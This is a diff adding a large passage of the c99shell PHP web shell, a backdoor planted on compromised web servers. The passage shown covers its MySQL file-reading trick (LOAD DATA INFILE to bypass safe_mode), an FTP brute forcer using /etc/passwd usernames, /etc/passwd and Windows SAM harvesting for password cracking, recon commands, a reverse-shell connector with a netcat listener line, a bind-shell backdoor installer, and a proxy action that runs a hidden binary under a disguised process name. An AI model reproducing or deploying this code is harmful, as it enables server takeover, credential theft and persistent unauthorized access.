+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
